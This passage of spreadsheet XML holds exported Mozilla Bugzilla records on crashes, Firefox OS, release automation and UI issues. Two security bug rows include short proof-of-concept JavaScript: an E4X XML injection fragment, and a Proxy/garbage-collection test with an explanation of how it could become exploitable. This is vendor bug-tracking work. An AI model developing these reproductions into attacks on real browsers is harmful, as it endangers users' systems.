      <c r="T1744" t="n">
        <v>1</v>
      </c>
      <c r="U1744" t="n">
        <v>0</v>
      </c>
      <c r="V1744" t="n">
        <v>102</v>
      </c>
      <c r="W1744" t="inlineStr">
        <is>
          <t>Created attachment 280282
testcase
See testcase which crashes current trunk build on load.
This seems to have regressed between 2007-04-29 and 2007-04-30:
http://bonsai.mozilla.org/cvsquery.cgi?treeid=default&amp;module=all&amp;branch=HEAD&amp;branchtype=match&amp;dir=&amp;file=&amp;filetype=match&amp;who=&amp;whotype=match&amp;sortby=Date&amp;hours=2&amp;date=explicit&amp;mindate=2007-04-29+03&amp;maxdate=2007-04-30+07&amp;cvsroot=%2Fcvsroot
Not sure which patch might have caused it, it might be coincidence anyway.
Right before the crash I see these assertions in a debug build:
###!!! ASSERTION: reflowing in the middle of frame construction: 'mPresContext-&gt;
mLayoutPhaseCount[eLayoutPhase_FrameC] == 0', file ../../dist/include/layout/nsP
resContext.h, line 921
###!!! ASSERTION: no placeholder frame: 'nsnull != placeholderFrame', file c:/mo
zilla/mozilla/layout/generic/nsHTMLReflowState.cpp, line 1094
http://crash-stats.mozilla.com/report/index/b5aad48a-5f2b-11dc-8c22-001a4bd43e5c
0  	nsHTMLReflowState::GetNearestContainingBlock(nsIFrame*, int&amp;, int&amp;)  	 mozilla/layout/generic/nsHTMLReflowState.cpp:700
1 	nsHTMLReflowState::InitAbsoluteConstraints(nsPresContext*, nsHTMLReflowState const*, int, int) 	mozilla/layout/generic/nsHTMLReflowState.cpp:1100
2 	nsHTMLReflowState::InitConstraints(nsPresContext*, int, int, nsMargin const*, nsMargin const*) 	mozilla/layout/generic/nsHTMLReflowState.cpp:1803
3 	nsHTMLReflowState::Init(nsPresContext*, int, int, nsMargin const*, nsMargin const*) 	mozilla/layout/generic/nsHTMLReflowState.cpp:315
4 	nsHTMLReflowState::nsHTMLReflowState(nsPresContext*, nsHTMLReflowState const&amp;, nsIFrame*, nsSize const&amp;, int, int, int) 	mozilla/layout/generic/nsHTMLReflowState.cpp:180
5 	nsAbsoluteContainingBlock::ReflowAbsoluteFrame(nsIFrame*, nsPresContext*, nsHTMLReflowState const&amp;, int, int, nsIFrame*, unsigned int&amp;, nsRect*) 	mozilla/layout/generic/nsAbsoluteContainingBlock.cpp:369
6 	nsAbsoluteContainingBlock::Reflow(nsIFrame*, nsPresContext*, nsHTMLReflowState const&amp;, int, int, int, int, nsRect*) 	mozilla/layout/generic/nsAbsoluteContainingBlock.cpp:159
7 	nsBlockFrame::Reflow(nsPresContext*, nsHTMLReflowMetrics&amp;, nsHTMLReflowState const&amp;, unsigned int&amp;) 	mozilla/layout/generic/nsBlockFrame.cpp:1138
8 	nsFrame::BoxReflow(nsBoxLayoutState&amp;, nsPresContext*, nsHTMLReflowMetrics&amp;, nsIRenderingContext*, int, int, int, int, int) 	mozilla/layout/generic/nsFrame.cpp:6112
9 	nsFrame::RefreshSizeCache(nsBoxLayoutState&amp;) 	mozilla/layout/generic/nsFrame.cpp:5719
10 	nsFrame::GetBoxAscent(nsBoxLayoutState&amp;) 	mozilla/layout/generic/nsFrame.cpp:5882
etc...</t>
        </is>
      </c>
      <c r="X1744" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1745">
      <c r="A1745" t="n">
        <v>924104</v>
      </c>
      <c r="B1745" t="inlineStr">
        <is>
          <t>2013-10-07 07:42:29 -0700</t>
        </is>
      </c>
      <c r="C1745" t="inlineStr">
        <is>
          <t>Retrieved objects from the datastore API cannot be modified and they are empty</t>
        </is>
      </c>
      <c r="D1745" t="inlineStr">
        <is>
          <t>2014-01-06 11:54:24 -0800</t>
        </is>
      </c>
      <c r="E1745" t="n">
        <v>1</v>
      </c>
      <c r="F1745" t="n">
        <v>1</v>
      </c>
      <c r="G1745" t="n">
        <v>3</v>
      </c>
      <c r="H1745" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1745" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1745" t="inlineStr">
        <is>
          <t>DOM: Device Interfaces</t>
        </is>
      </c>
      <c r="K1745" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1745" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1745" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N1745" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1745" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1745" t="inlineStr"/>
      <c r="Q1745" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1745" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1745" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T1745" t="n">
        <v>1</v>
      </c>
      <c r="U1745" t="n">
        <v>0</v>
      </c>
      <c r="V1745" t="n">
        <v>7</v>
      </c>
      <c r="W1745" t="inlineStr">
        <is>
          <t>Created attachment 814115
TestCase_DataStore.zip
Retrieved objects from the datastore API cannot be modified.
Test case attached as Gaia App
Obtained Result: Error: Permission denied to access property 'xxxx'. KO</t>
        </is>
      </c>
      <c r="X1745" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1746">
      <c r="A1746" t="n">
        <v>754736</v>
      </c>
      <c r="B1746" t="inlineStr">
        <is>
          <t>2012-05-13 18:04:14 -0700</t>
        </is>
      </c>
      <c r="C1746" t="inlineStr">
        <is>
          <t>[Security Review] B2G Gaia - Calendar</t>
        </is>
      </c>
      <c r="D1746" t="inlineStr">
        <is>
          <t>2013-02-06 15:55:19 -0800</t>
        </is>
      </c>
      <c r="E1746" t="n">
        <v>1</v>
      </c>
      <c r="F1746" t="n">
        <v>1</v>
      </c>
      <c r="G1746" t="n">
        <v>5</v>
      </c>
      <c r="H1746" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1746" t="inlineStr">
        <is>
          <t>mozilla.org</t>
        </is>
      </c>
      <c r="J1746" t="inlineStr">
        <is>
          <t>Security Assurance: Review Request</t>
        </is>
      </c>
      <c r="K1746" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1746" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1746" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1746" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1746" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1746" t="inlineStr">
        <is>
          <t>[Score:44:Medium]</t>
        </is>
      </c>
      <c r="Q1746" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1746" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1746" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1746" t="n">
        <v>1</v>
      </c>
      <c r="U1746" t="n">
        <v>0</v>
      </c>
      <c r="V1746" t="n">
        <v>4</v>
      </c>
      <c r="W1746" t="inlineStr">
        <is>
          <t>Review of the gaia Calendar app. http://calendar.gaiamobile.org/</t>
        </is>
      </c>
      <c r="X1746" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1747">
      <c r="A1747" t="n">
        <v>453915</v>
      </c>
      <c r="B1747" t="inlineStr">
        <is>
          <t>2008-09-05 17:55:59 -0700</t>
        </is>
      </c>
      <c r="C1747" t="inlineStr">
        <is>
          <t>XML injection possible in E4X parsing via "default xml namespace"</t>
        </is>
      </c>
      <c r="D1747" t="inlineStr">
        <is>
          <t>2009-01-14 12:38:07 -0800</t>
        </is>
      </c>
      <c r="E1747" t="n">
        <v>1</v>
      </c>
      <c r="F1747" t="n">
        <v>1</v>
      </c>
      <c r="G1747" t="n">
        <v>3</v>
      </c>
      <c r="H1747" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1747" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1747" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1747" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1747" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1747" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1747" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1747" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1747" t="inlineStr">
        <is>
          <t>[sg:low?]</t>
        </is>
      </c>
      <c r="Q1747" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1747" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1747" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1747" t="n">
        <v>1</v>
      </c>
      <c r="U1747" t="n">
        <v>0</v>
      </c>
      <c r="V1747" t="n">
        <v>39</v>
      </c>
      <c r="W1747" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.16) Gecko/20080716 Firefox/2.0.0.16
Build Identifier: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.16) Gecko/20080716 Firefox/2.0.0.16
This Javascript fragment illustrates the problem:
default xml namespace = '\'';
&lt;foo/&gt;
You will get an error:
Error: unterminated string literal
Source File: http://blah/
Line: 162, Column: 16
Source Code:
&lt;parent xmlns='''&gt;&lt;blah...
The concern is that attacks may be possible via injecting XML into cross-domain XML via the &lt;script src=&gt; facility.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
        </is>
      </c>
      <c r="X1747" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1748">
      <c r="A1748" t="n">
        <v>568465</v>
      </c>
      <c r="B1748" t="inlineStr">
        <is>
          <t>2010-05-27 05:51:28 -0700</t>
        </is>
      </c>
      <c r="C1748" t="inlineStr">
        <is>
          <t>GC hazard with lookupProperty callers with non-native objects</t>
        </is>
      </c>
      <c r="D1748" t="inlineStr">
        <is>
          <t>2010-09-27 18:28:28 -0700</t>
        </is>
      </c>
      <c r="E1748" t="n">
        <v>1</v>
      </c>
      <c r="F1748" t="n">
        <v>1</v>
      </c>
      <c r="G1748" t="n">
        <v>3</v>
      </c>
      <c r="H1748" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1748" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1748" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1748" t="inlineStr">
        <is>
          <t>1.9.1 Branch</t>
        </is>
      </c>
      <c r="L1748" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1748" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1748" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1748" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1748" t="inlineStr">
        <is>
          <t>[sg:critical?] keep hidden until 566141 is fixed [ccbr][qa-needs-STR]</t>
        </is>
      </c>
      <c r="Q1748" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1748" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1748" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1748" t="n">
        <v>1</v>
      </c>
      <c r="U1748" t="n">
        <v>0</v>
      </c>
      <c r="V1748" t="n">
        <v>38</v>
      </c>
      <c r="W1748" t="inlineStr">
        <is>
          <t>Most if not all all callers of  lookupProperty pass pointer to unrooted JSObject * from the native stack for the objp parameter. The assumption is that objp would be either the original rooted object or would come from the prototype in which case it would be rooted by the original object. But proxy breaks that assumption since the has method implementing lookupProperty can remove proxy from the prototype chain unrooting and garbage-collecting the proxy. The following test demonstrates that:
Object.prototype.__proto__ = Proxy.create({
        get has() {
            Object.prototype.__proto__ = null;
            gc();
            return function(name) {
                print(1);
                return name == 'a';
            }
        },
    });
'a' in {};
It generates:
/home/igor/s/y.js:12: TypeError: proxy was fixed while executing the handler
That error comes from isProxy check to verify that the class is still a proxy. This is potentially exploitable since the script can use the pattern above recursively with 1000 or so proxies per one GC cycle and eventually learn the address of js_ProxyClass and pass isProxy check.
As a workaround the proxy can root the proxy argument to all proxy_ methods implementing JSObjectOps. But the right solution it seems to require a conservative stack scanner for the proxies.</t>
        </is>
      </c>
      <c r="X1748" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1749">
      <c r="A1749" t="n">
        <v>706948</v>
      </c>
      <c r="B1749" t="inlineStr">
        <is>
          <t>2011-12-01 13:12:34 -0800</t>
        </is>
      </c>
      <c r="C1749" t="inlineStr">
        <is>
          <t>In some cases, a question displays "No replies" with a reply below</t>
        </is>
      </c>
      <c r="D1749" t="inlineStr">
        <is>
          <t>2012-05-07 18:28:51 -0700</t>
        </is>
      </c>
      <c r="E1749" t="n">
        <v>1</v>
      </c>
      <c r="F1749" t="n">
        <v>1</v>
      </c>
      <c r="G1749" t="n">
        <v>5</v>
      </c>
      <c r="H1749" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1749" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J1749" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K1749" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1749" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1749" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1749" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1749" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1749" t="inlineStr">
        <is>
          <t>u=contributor c=questions p=1</t>
        </is>
      </c>
      <c r="Q1749" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1749" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1749" t="inlineStr">
        <is>
          <t>2012.8</t>
        </is>
      </c>
      <c r="T1749" t="n">
        <v>1</v>
      </c>
      <c r="U1749" t="n">
        <v>0</v>
      </c>
      <c r="V1749" t="n">
        <v>21</v>
      </c>
      <c r="W1749" t="inlineStr">
        <is>
          <t>For example:
https://support.mozilla.com/en-US/questions/901169
http://cl.ly/2q2D1Y3q0j3V3x0v063w</t>
        </is>
      </c>
      <c r="X1749" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1750">
      <c r="A1750" t="n">
        <v>1469450</v>
      </c>
      <c r="B1750" t="inlineStr">
        <is>
          <t>2018-06-18 17:16:35 -0700</t>
        </is>
      </c>
      <c r="C1750" t="inlineStr">
        <is>
          <t>release-update-verify-config tasks failing for 61.0rc</t>
        </is>
      </c>
      <c r="D1750" t="inlineStr">
        <is>
          <t>2018-06-20 21:40:46 -0700</t>
        </is>
      </c>
      <c r="E1750" t="n">
        <v>1</v>
      </c>
      <c r="F1750" t="n">
        <v>1</v>
      </c>
      <c r="G1750" t="n">
        <v>5</v>
      </c>
      <c r="H1750" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1750" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1750" t="inlineStr">
        <is>
          <t>Release Automation: Updates</t>
        </is>
      </c>
      <c r="K1750" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1750" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1750" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1750" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1750" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1750" t="inlineStr">
        <is>
          <t>[releaseduty]</t>
        </is>
      </c>
      <c r="Q1750" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1750" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S1750" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1750" t="n">
        <v>1</v>
      </c>
      <c r="U1750" t="n">
        <v>0</v>
      </c>
      <c r="V1750" t="n">
        <v>9</v>
      </c>
      <c r="W1750" t="inlineStr">
        <is>
          <t>example taskid:
NvDsOfpFSuOR2fy4Ggfw1w
log:
[task 2018-06-18T23:04:22.973Z] 23:04:22    FATAL - KeyError: 'last_watershed'
irc:
nthomas&gt; suspect we drop it because last-watershed: null on the job, and https://dxr.mozilla.org/mozilla-beta/source/taskcluster/taskgraph/transforms/update_verify_config.py#94
nthomas&gt; fyi, it's the releasetest config
16:22:44 er, release-localtest
16:23:00 the beta-localtest one is fine (UVCS on TH)
16:23:43 yes to your people question
16:25:11 this could be bustage from my https://bugzilla.mozilla.org/show_bug.cgi?id=1462120
&lt;•nthomas&gt; *waves hands* something to do with two levels of by-&lt;foo&gt; only for mozilla-release at https://hg.mozilla.org/releases/mozilla-release/file/6f3df7ea04aa672f91f3f80cf52eb67114b0c2fe/taskcluster/ci/release-update-verify-config/kind.yml#l75 and
16:55:06 https://hg.mozilla.org/releases/mozilla-release/file/6f3df7ea04aa672f91f3f80cf52eb67114b0c2fe/taskcluster/taskgraph/transforms/update_verify_config.py#l88</t>
        </is>
      </c>
      <c r="X1750" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1751">
      <c r="A1751" t="n">
        <v>804994</v>
      </c>
      <c r="B1751" t="inlineStr">
        <is>
          <t>2012-10-24 06:04:38 -0700</t>
        </is>
      </c>
      <c r="C1751" t="inlineStr">
        <is>
          <t>Some of the videos at twitch.tv are not recognized as supported videos - requires M3U support</t>
        </is>
      </c>
      <c r="D1751" t="inlineStr">
        <is>
          <t>2024-03-07 12:37:51 -0800</t>
        </is>
      </c>
      <c r="E1751" t="n">
        <v>1</v>
      </c>
      <c r="F1751" t="n">
        <v>1</v>
      </c>
      <c r="G1751" t="n">
        <v>2</v>
      </c>
      <c r="H1751" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1751" t="inlineStr">
        <is>
          <t>Web Compatibility</t>
        </is>
      </c>
      <c r="J1751" t="inlineStr">
        <is>
          <t>Site Reports</t>
        </is>
      </c>
      <c r="K1751" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1751" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M1751" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N1751" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1751" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1751" t="inlineStr">
        <is>
          <t>[clientsniff][country-all][m3u8] [notcontactready][platform-rel-Amazon][platform-rel-Twitch]</t>
        </is>
      </c>
      <c r="Q1751" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1751" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1751" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1751" t="n">
        <v>1</v>
      </c>
      <c r="U1751" t="n">
        <v>2</v>
      </c>
      <c r="V1751" t="n">
        <v>21</v>
      </c>
      <c r="W1751" t="inlineStr">
        <is>
          <t>Firefox Mobile 17.0b3
Device: Samsung Galaxy Tab 2 7.0 (Android 4.0.4) / Samsung Galaxy S2 (Android 4.0.3)
Steps to reproduce:
1. Go to twitch.tv
2. Wait for the video playback on the main page to be displayed
Expected results:
The video is displayed
Actual results:
A " No video with supported format and MIME type found" error is displayed. On desktop the video is a Flash Player videos and flash works on the device for other videos. The videos seem to be live streams but I am not sure that this is true for all the videos that give this error.
Note:
Issue is not reproducible on the Android Browser</t>
        </is>
      </c>
      <c r="X1751" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1752">
      <c r="A1752" t="n">
        <v>1311405</v>
      </c>
      <c r="B1752" t="inlineStr">
        <is>
          <t>2016-10-19 07:51:08 -0700</t>
        </is>
      </c>
      <c r="C1752" t="inlineStr">
        <is>
          <t>[meta] Make Activity Stream available for iPad devices</t>
        </is>
      </c>
      <c r="D1752" t="inlineStr">
        <is>
          <t>2017-04-10 04:16:42 -0700</t>
        </is>
      </c>
      <c r="E1752" t="n">
        <v>1</v>
      </c>
      <c r="F1752" t="n">
        <v>1</v>
      </c>
      <c r="G1752" t="n">
        <v>2</v>
      </c>
      <c r="H1752" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1752" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1752" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K1752" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1752" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1752" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1752" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1752" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1752" t="inlineStr">
        <is>
          <t>[MobileAS]</t>
        </is>
      </c>
      <c r="Q1752" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1752" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1752" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1752" t="n">
        <v>1</v>
      </c>
      <c r="U1752" t="n">
        <v>0</v>
      </c>
      <c r="V1752" t="n">
        <v>9</v>
      </c>
      <c r="W1752" t="inlineStr">
        <is>
          <t>For our MVP, we want to at the very least make Activity Stream available to iPad users. To limit scope, the goal is to provide a minimal version of it for tablet users by reusing the existing layout. Android approaches this by reusing the phone layout but adding margins on the left/right to make it look a bit better on tablets. On iOS we can probably do something similar to make it work.</t>
        </is>
      </c>
      <c r="X1752" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1753">
      <c r="A1753" t="n">
        <v>822848</v>
      </c>
      <c r="B1753" t="inlineStr">
        <is>
          <t>2012-12-18 14:46:45 -0800</t>
        </is>
      </c>
      <c r="C1753" t="inlineStr">
        <is>
          <t>hide the detailsPane for the new downloads view</t>
        </is>
      </c>
      <c r="D1753" t="inlineStr">
        <is>
          <t>2012-12-29 04:30:39 -0800</t>
        </is>
      </c>
      <c r="E1753" t="n">
        <v>1</v>
      </c>
      <c r="F1753" t="n">
        <v>1</v>
      </c>
      <c r="G1753" t="n">
        <v>2</v>
      </c>
      <c r="H1753" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1753" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1753" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K1753" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1753" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1753" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1753" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1753" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1753" t="inlineStr"/>
      <c r="Q1753" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1753" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1753" t="inlineStr">
        <is>
          <t>Firefox 20</t>
        </is>
      </c>
      <c r="T1753" t="n">
        <v>1</v>
      </c>
      <c r="U1753" t="n">
        <v>0</v>
      </c>
      <c r="V1753" t="n">
        <v>8</v>
      </c>
      <c r="W1753" t="inlineStr">
        <is>
          <t>we don't need a details pane, it should be collapsed so we maximize the content area.</t>
        </is>
      </c>
      <c r="X1753" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1754">
      <c r="A1754" t="n">
        <v>1435863</v>
      </c>
      <c r="B1754" t="inlineStr">
        <is>
          <t>2018-02-05 13:45:07 -0800</t>
        </is>
      </c>
      <c r="C1754" t="inlineStr">
        <is>
          <t>Add source map support to activity stream</t>
        </is>
      </c>
      <c r="D1754" t="inlineStr">
        <is>
          <t>2019-06-28 14:29:46 -0700</t>
        </is>
      </c>
      <c r="E1754" t="n">
        <v>1</v>
      </c>
      <c r="F1754" t="n">
        <v>1</v>
      </c>
      <c r="G1754" t="n">
        <v>2</v>
      </c>
      <c r="H1754" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1754" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1754" t="inlineStr">
        <is>
          <t>New Tab Page</t>
        </is>
      </c>
      <c r="K1754" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1754" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1754" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1754" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1754" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1754" t="inlineStr"/>
      <c r="Q1754" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1754" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1754" t="inlineStr">
        <is>
          <t>Firefox 60</t>
        </is>
      </c>
      <c r="T1754" t="n">
        <v>1</v>
      </c>
      <c r="U1754" t="n">
        <v>0</v>
      </c>
      <c r="V1754" t="n">
        <v>4</v>
      </c>
      <c r="W1754" t="inlineStr">
        <is>
          <t>Source maps with webpack appear to be working now! :D</t>
        </is>
      </c>
      <c r="X1754" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1755">
      <c r="A1755" t="n">
        <v>295670</v>
      </c>
      <c r="B1755" t="inlineStr">
        <is>
          <t>2005-05-27 00:24:39 -0700</t>
        </is>
      </c>
      <c r="C1755" t="inlineStr">
        <is>
          <t>Crash in [@ nsDOMEvent::GetTargetFromFrame] when clicking menu items...</t>
        </is>
      </c>
      <c r="D1755" t="inlineStr">
        <is>
          <t>2019-03-13 06:46:04 -0700</t>
        </is>
      </c>
      <c r="E1755" t="n">
        <v>1</v>
      </c>
      <c r="F1755" t="n">
        <v>1</v>
      </c>
      <c r="G1755" t="n">
        <v>3</v>
      </c>
      <c r="H1755" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1755" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1755" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K1755" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1755" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1755" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1755" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1755" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1755" t="inlineStr"/>
      <c r="Q1755" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1755" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1755" t="inlineStr">
        <is>
          <t>mozilla1.8beta3</t>
        </is>
      </c>
      <c r="T1755" t="n">
        <v>1</v>
      </c>
      <c r="U1755" t="n">
        <v>0</v>
      </c>
      <c r="V1755" t="n">
        <v>14</v>
      </c>
      <c r="W1755" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050526 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050526 Firefox/1.0+
On http://www.demonhunter.net if you click "media" it will crash browser (3/4 of
the time)
Reproducible: Sometimes
Steps to Reproduce:
1. Goto www.demonhunter.net
2. Click Media in the menu
3. Click it again if nothing happens
Actual Results:  
Crashes browser.
Expected Results:  
Not crash.</t>
        </is>
      </c>
      <c r="X1755" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1756">
      <c r="A1756" t="n">
        <v>784404</v>
      </c>
      <c r="B1756" t="inlineStr">
        <is>
          <t>2012-08-21 10:27:02 -0700</t>
        </is>
      </c>
      <c r="C1756" t="inlineStr">
        <is>
          <t>Intermittent assertion in dom/devicestorage/test/test_basic.html ("Assertion failure: i &lt; Length() (invalid array index), at e:\builds\moz2_slave\m-in-w32-dbg\build\obj-firefox\dist\include\nsTArray.h:526")</t>
        </is>
      </c>
      <c r="D1756" t="inlineStr">
        <is>
          <t>2013-03-18 13:06:30 -0700</t>
        </is>
      </c>
      <c r="E1756" t="n">
        <v>1</v>
      </c>
      <c r="F1756" t="n">
        <v>1</v>
      </c>
